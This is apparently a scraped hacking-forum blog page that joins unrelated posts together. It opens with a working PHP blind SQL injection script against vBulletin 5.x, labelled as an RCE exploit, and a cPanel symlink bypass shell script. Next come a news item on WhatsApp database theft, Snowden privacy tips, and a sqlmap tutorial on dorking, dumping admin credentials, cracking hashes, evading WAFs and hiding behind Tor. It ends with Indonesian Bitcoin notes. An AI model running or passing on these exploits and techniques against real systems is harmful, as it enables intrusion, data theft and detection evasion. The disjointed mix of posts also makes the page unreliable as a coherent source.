Author: Nytro
Powered by: Romanian Security Team
Price: Free. Educational.
ini_set('display_errors', 1);
// Get arguments
$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);
// Function to send a POST request
function httpPost($url,$params)
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept: application/json, text/javascript, */*; q=0.01',
'X-Requested-With: XMLHttpRequest',
'Referer: https://rstforums.com/v5/memberlist',
'Accept-Language: en-US,en;q=0.5',
'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
$output = curl_exec($ch);
if($output == FALSE) print htmlspecialchars(curl_error($ch));
return $output;
// Function to get string between two other strings
function get_string_between($string, $start, $end)
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
// Get version
print "\r\nvBulletin 5.x Remote Code Execution Exploit\r\n\r\n";
print "Version: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 ,1)--+"+' .
$letter = 1;
while(strpos($result, 'No Users Matched Your Query') == false)
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' . $letter . ',1)--+"+' .
// Get user
print "\r\nUser: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 ,1)--+"+' .
$letter = 1;
while(strpos($result, 'No Users Matched Your Query') == false)
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
// Get database
print "\r\nDatabase: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 1,1)--+"+' .
$letter = 1;
while(strpos($result, 'No Users Matched Your Query') == false)
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' . $letter . ',1)--+"+' .
print "\r\n"
All About : Hacking, Cracking, Phreaking, Carding, Virus, Social Engineering, IRC, Windows, Linux, Hardware, Software, Networking, Programming, Web/ Graphic Design, Batch, Shell, DOS, Command Line Interpreters, Info, Phone
vBulletin 5.x Remote Code Execution Exploit
CPanel Symlink Bypasser
# ______ __ ____ ___
# / ____/___ ____ _____ ___ / / / __ )__ ______ ____ ______________ _____ _ _< /
# / / / __ \/ __ `/ __ \/ _ \/ / / __ / / / / __ \/ __ `/ ___/ ___/ _ \/ ___/ | | / / /
# / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / /
# \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/
# /_/ /____/_/
# CPanel Symlink Bypasser [Public Version] #
# By Hannibal Ksa (@r00t3rz) & R3m0t3 Nu11 #
# alm3refh.com © Group XP 2014 #
# 1. UPLOAD ME IN /home/user as Cpbypass.sh
# echo "Alm3refh bypass" ~| bash Cpbypass.sh -s "Alm3refh bypass" -- email@gmail.com
# email@gmail.com = your email
# FILE #
echo ""
echo " ______ __ ____ ___"
echo " / ____/___ ____ _____ ___ / / / __ \)__ ______ ____ ______________ _____ _ _< /"
echo " / / / __ \/ __ \`/ __ \/ _ \/ / / __ / / / / __ \/ __ \`/ ___/ ___/ _ \/ ___/ | | / / / "
echo " / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / / "
echo " \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/ "
echo " /_/ /____/_/ "
echo " CPanel Symlink Bypasser [Public Version]"
echo " By Hannibal Ksa & R3m0t3 Nu11"
echo ""
echo ""
rand=bypass$(( $RANDOM % 10 + 100 ));
# 1st 3xpl017
ln -sf $SYM tmp/analog/$rand.html
echo ""
echo "1st Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/analog/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
# 2nd 3xpl017
ln -sf $SYM tmp/webalizer/$rand.html
echo ""
echo "2nd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizer/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
# 3rd 3xpl017
ln -sf $SYM tmp/webalizerftp/$rand.html
echo ""
echo "3rd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizerftp/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
# 4th 3xpl017
ln -sf $SYM logs/$rand.doc
echo ""
echo "4th Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/frontend/x3/raw/index.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo ""
echo ""
# DONE of the public version!
# E0F
Listing Website Free Bitcoin Part 1
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Hackers can steal Whatsapp conversations due to Android security flaw
A SECURITY VULNERABILTIY in the Android mobile operating system has been discovered that can allow cyber criminals to steal conversations from users of mobile messaging service Whatsapp.
Discovered by Bas Bosschert, the CTO of startup company Doublethink, the flaw was detailed in a blog post in which Bosschert demonstrated the method for accessing Whatsapp chats. He confirmed that the vulnerability still exists even after Google updated the Whatsapp app just last week.
The exploit is possible due to the Whatsapp database on Android being saved on the SD card, which can be read by any Android application if the user allows it to access the card.
"And since majority of the people [allow] everything on their Android device, this is not much of a problem," Bosschert said, noting that this is an issue in the Android infrastructure, specifically a problem with Android's data sandboxing system, as opposed to a security flaw in Whatsapp.
From there, a malicious app could access the Whatsapp conversation database, Bosschert said, testing his method with a companion app that he built, which uses a loading screen to distract the user while the database files are being uploaded.
Bosschert said that he can even decrypt the database with his own script despite the Whatsapp application's attempts in its recent update to encrypt the database to the point where it can't be opened by SQLite.
"We can simply decrypt this database using a simple python script," Bosschert said. "This script converts the [encrypted] database to a plain SQLite3 database.
"So, we can conclude that every application can read the Whatsapp database and it is also possible to read the chats from the encrypted databases. Facebook didn't need to buy Whatsapp to read your chats."
The full step by step guide for how he hacked Whatsapp can be found in Bosschert's blog post.
Whatsapp added privacy features and the ability to pay for a friend's subscription when it updated its Android app on Monday.
The added privacy includes controls for users to hide when they were last seen, their profile photo and their status updates from prying eyes.
While these are not groundbreaking changes, releasing a privacy update likely will appease its user following Facebook's $19bn acquisition of the company that has sparked privacy fears among Whatsapp users. These concerns are ongoing, as privacy groups called for the FTC to investigate the buyout last week, saying that it represents a threat to privacy
How to Use Edward Snowden’s Three Tips for Digital Privacy
Former NSA contractor Edward Snowden says he has been able to outfox U.S. officials using encryption. During a webcast on NSA leaks and data security at the South by Southwest conference in Austin, Texas, Snowden shared some privacy tips for the rest of us: Encrypt your hard drive, use plug-ins for your browser that prevent organizations or companies from tracking you online, and cover your tracks with Tor, an online network that promises anonymity.
These tips range from simple to complicated depending on your computer savvy, so we’ve collected some basic info and guides to help you get started:
Encrypt your hard drive
Encryption is the “Defense Against the Dark Arts” for the digital world, said Snowden, referencing the class Harry Potter took during his Hogwarts years.
Encryption is the “Defense Against the Dark Arts” for the digital world, said Snowden, referencing the class Harry Potter took during his Hogwarts years.
Adding password protection to files on your computer is just the first step to personal file security. Encrypting the entire hard disk on your computer ensures personal information is secure, even if your device is stolen or seized.
Newer versions of Windows and Mac operating systems come with built-in disk encryption tools. BitLocker, which encrypts your entire hard drive, comes as part of Windows 7 Ultimate and Enterprise versions, and Windows 8.1 Pro and Enterprise editions. Appleoffer detailed tutorials online on how disk encryption services can be turned on. For those with older operating systems, TrueCrypt, there’s a free program for encrypting your drive. Here’s a guide on how to download and install it.
The Electronic Frontier Foundation, an organization that works on digital rights issues, has a guide to how encryption can help in different situations.
Use browser plug-ins to avoid being tracked onlineThe Wall Street Journal’s series ‘What They Know‘ showed companies are using digital tracking for online activities such as shopping, varying prices based on shopping patterns and location information. While that may seem harmless, it’s important to know that if retailers can see you, it’s likely that others can as well.
Slowly, companies such as Google have agreed to support a do-not-track button to be embedded in most Web browsers. Google’s Chrome browser has a setting that most users can turn on to send a do-not-track request, and so does Microsoft’s Internet Explorer 10. They won’t work with all websites, but it’s a good place to begin.
Plug-ins or small software extensions available for browsers are another way to go about it. Ghostery, a plug-in available for most popular browsers, when installed will show the number of trackers detected but not automatically block them. Users have the choice to individually or in bulk block these trackers.
You can also choose sites, such as the search engine DuckDuckGo, which do not record or share your searches.
Cover your tracks with Tor Over the last few months, Tor, a network that promises anonymity and privacy online has come under the spotlight. Tor hosts a network of websites, some of which have been under the scanner of law enforcement officials for illegal activities. Late last year, the Federal Bureau of Investigation shut down Silk Road, a marketplace available only through the Tor network, for the sale of illegal drugs.
Tor may be useful for criminals, but its cloak of anonymity is increasingly a comfort to anyone looking for privacy. Tor offers its own browser that can be used to connect to news sites or instant messaging services and chat rooms that can’t be easily tracked online.
To get started on the Tor network, take the advice of the ExtremeTech blog, and download the Tor Browser Bundle available for Windows, Mac and Linux. It’s similar to using the Firefox or Chrome browser but slower, because Internet traffic is routed through a series of proxies to mask its origin.
Other ways to lower your online profile include using encrypted chat services such as SilentCircle, and encrypted mail such as Hushmail. There are even smartphones coming out soon that will offer a suite of privacy features baked right in.
Playing with SQL Injection and Firewall Bypassing
Playing with SQL Injection and Firewall Bypassing
Disclaimer: This article is only for educational purposes, security researchers, and pentester. I would like to clarify that I am completely against cyber-crime.
Most cyber-attacks in the world that involve websites occurs due to lack of updates and configuration faults resulting in explorations of success.
One of the main threats is SQL Injection that left many worried about their systems, programmers, and SQL databases.
The biggest problem is not the DBMS itself but the lack of definition and verification of the input fields in web applications.
Many web developers do not know how SQL queries can be handled and assume that an SQL query is a trusted command. This allows for SQL queries to circumvent access controls, thereby bypassing standard authentication and authorization checks. And sometimes SQL queries even may allow access to the command shell on the server operating system level.
Direct injection of SQL commands is a technique where an attacker creates or alters existing SQL commands to expose hidden data or to override valuable data, and even to execute dangerous system level commands on the server.
Structured Query Language is the standard declarative language for relational databases. This allows for its simplicity and ease of use.
SQL was originally developed in the early 70s at IBM labs.
SQLMAP is a tool used for this type of vulnerability.
It is Open source, and often is used for Penetration Testing that enable intrusions on fragile DBMS written in Python. It provides functions to detect and exploit vulnerabilities of SQLI. Let's use the example sqlmap.py, widely used in operating systems and databases.
Readers I will try to explain this in the simplest possible way.
You must have a vulnerable target, to find out if the target is vulnerable just input ' at the end of the URL being tested and press "Enter" if some error is returned the database is vulnerable.
You can use google to find it with some dork. Example: inurl: news.php id = 1?
There is a bank of google dorks data and several other possibilities that can be used to filter your search.
cd /pentest/database/sqlmap
We will now begin the game, to view the menu for sqlmap.py use the command ./sqlmap.py -h
Let's run sqlmap.py, the parameter [--dbs], to search the all databases in DBMS.
Or use the parameter --current-db to show the databases that are being used.
The parameter -D is for the target of database and --tables is tables list.
We will verify the existence of interesting information in the table (admin_users), time to list the columns. The parameter is –columns.
It is important to always indicate the target database (-D) data before listing the tables because if you do not do this (without the -D) it will list all tables in all databases.
-T = target table
-C = target columns, can be more than one column to be chosen. Example: username, password.
--dump = obtain, extract data.
Important to remember the parameter --proxy: enables use of proxy.
Example: /sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --proxy=
Readers, I think that's the basics for beginners. sqlmap.py also has many interesting functions, I suggest researching about --prefix=PREFIX, --postfix=POSTFIX and takeover options.
More information about the program and videos of them in action on the official site.
--dump is to extract the data from the site but is not given any, this must be within the selected column, and you have to choosen what to extract from the column, where I extracted the logins and passwords are saved within the column.
Generally, the field of "passwords" DBMS are encrypted.
We then need to decrypt the passwords in order to access the target system.
We can find a way to log into the system. But wait, the passwords are encrypted in MD5, hahahaha put your hash on:http://www.md5decrypt.org and may be decrypted or otherwise
Readers, lucky for us, there are some awesome tamper scripts for sqlmap, which can be found in the latest development version from the Subversion repository.
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
In fact the function of the tamper scripts is to modify the request in a way that will escape detection rules WAF (Web Application Firewall). In some cases it may be necessary to combine some tamper scripts together in order to fool the WAF. For a complete list of scripts for tampering, you may find https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/
Many enterprises often overlook the current vulnerabilities and rely only on the firewall for protection. Unfortunately, most, if not all firewalls can be bypassed. So gentlemen, I want to demonstrate how to use some of the new features of sqlmap to bypass WAF’s/IDS.
Well, I'll demonstrate some important scripts that are charencode.py and charcodeencode.py to work with MySQL.
Hands-on: To begin using tamper scripts, you use the --tamper followed by the script name. In the example, we use the command:
Summary of charencode.py
Quite simply, this script is useful for ignoring very weak web application firewalls (WAF) …
Another interesting function url-decode the request before processing it through their set of rules (:
The web server will anyway go to url-decoded back version, concluding, it should work against any DBMS.
Example to use:
We will demonstrate the use of charunicodeencode.py for additional security. The vast number of organizations have deployed WAF. Guys, this is a tricky part to exploit such an environment. Well, standard SQL injection attack vectors will not work neither will the scripts.
That is the reason we use tamper scripts, this facility known as “tamper scripts" in aid of a quiet way to bypass web application firewalls.
Guys, I have demonstrated just a few of the many tamper scripts. We highly recommend testing them out as each one can be used in different situations.
Notes: That's not a tool for "script kiddies" it is of utmost importance to make use of such a powerful tool responsibly and maturely.
Caution if used in the wrong way, sqlmap generates many queries and can affect the performance of the database target, moreover strange entries and changes to the database schema are possible if the tool is not controlled and used extensively.
I will demonstrate to you how to use sqlmap with The Onion Router for the protection of IP, DNS, etc... In your Linux, in the terminal type:
$ sudo apt-get install tor tor-geoip
After enter the sqlmap folder and type:
./sqlmap.py -u "http://www.targetvuln.com/index.php?cata_id=1" -b -a –tor --check-tor--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
The argument --tor invokes the Tor to be used and the --check-tor checks if Tor is being used properly, if not, you will receive an error message in red at the terminal. The User Agent is the googlebot, all your requests on the site will look like the Google bot doing a little visit.
TOR at SQLMap, we can set your TOR proxy for hiding the source from where the traffic or request is generated.
–tor-port, –tor-type : the parameter can help you out to set the TOR proxy manually.
–check-tor : the parameter will check if the tor setup is appropriate and functional.
It is known that many targets have been explored through SQL Injection a few years ago when this threat was discovered, the injection form was "the nail". The pentester had to enter the codes manually, taking longer to complete the attack.
Then came the development of programs that automated attack. Nowadays perhaps the best known of these programs is sqlmap.py. SQLMAP is a program of open source testing framework written in Python. It has full support for database systems: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and also supports 6 types of SQL Injection techniques.
1. Correct the SQL server regularly.
2. Limit the use of dynamic queries.
3. Escape input data from users.
4. Stores the credentials of the database in a separate file.
5. Use the principle of least privilege.
6. Turn off the magic quotes.
7. Disable shell access.
8. Disable any feature of the bank that you do not need
9. Test your code
10. Search in google advanced techniques to correct this vulnerability.
Rincian Nilai Bitcoin
Bitcoin terdiri dari 8 angka 0 yaitu 0.00000000 yang urutan nilainya seperti
0.00000001 BTC = 1 satoshi
0.0000001 BTC = 10 satoshi
0.000001 BTC = 1 uBTC (micro)
0.00001 BTC = 10 uBTC
0.0001 BTC = 100 uBTC
0.001 BTC = 1 mBTC (milli)
0.01 BTC = 10 mBTC
0.1 BTC = 100 mBTC
1 BTC = 1 BTC
10 BTC = 10 BTC
100 BTC = 100 BTC
1.000 BTC = 1 kBTC (kilo)
10.000 BTC = 10 kBTC
100.000 BTC = 100 kBTC
1.000.000 BTC = 1 MBTC (mega)
10.000.000 BTC = 10 MBTC
Bitcoin adalah sebuah uang elektronik yang di buat pada tahun 2009 oleh Satoshi Nakamoto. Nama tersebut juga dikaitkan dengan perangkat lunak sumber terbuka yang dia rancang, dan juga menggunakan jaringan peer-ke-peer yang menghubungkan semuanya. Tidak seperti mata uang pada umumnya, bitcoin tidak tergantung dengan mempercayai penerbit utama. Bitcoin menggunakan sebuah database yang didistribusikan dan menyebar ke node-node dari sebuah jaringan P2P ke jurnal transaksi, dan menggunakan kriptografi untuk menyediakan fungsi-fungsi keamanan dasar, seperti memastikan bahwa bitcoin-bitcoin hanya dapat dihabiskan oleh orang mempunyainya, dan tidak pernah boleh dilakukan lebih dari satu kali.
Desain dari Bitcoin memperbolehkan untuk kepemilikan tanpa identitas (anonymous) dan pemindahan kekayaan. Bitcoin - bitcoin dapat disimpan di komputer pribadi dalam sebuah format file wallet atau di simpan oleh sebuah servis wallet pihak ketiga, dan terlepas dari semua itu Bitcoin - bitcoin dapat di kirim lewat internet kepada siapapun yang mempunyai sebuah alamat Bitcoin. Topologi peer-to-peer bitcoin dan kurangnya administrasi tunggal membuatnya tidak mungkin untuk otoritas, pemerintahan apapun, untuk memanipulasi nilai dari bitcoin - bitcoin atau menyebabkan inflasi dengan memproduksi lebih banyak bitcoin.
Bitcoin adalah salah satu dari implementasi pertama dari yang disebut cryptocurrency, pertama kali di deskripsikan oleh Wei Dai pada tahun 1998 dalam milis cypherpunks
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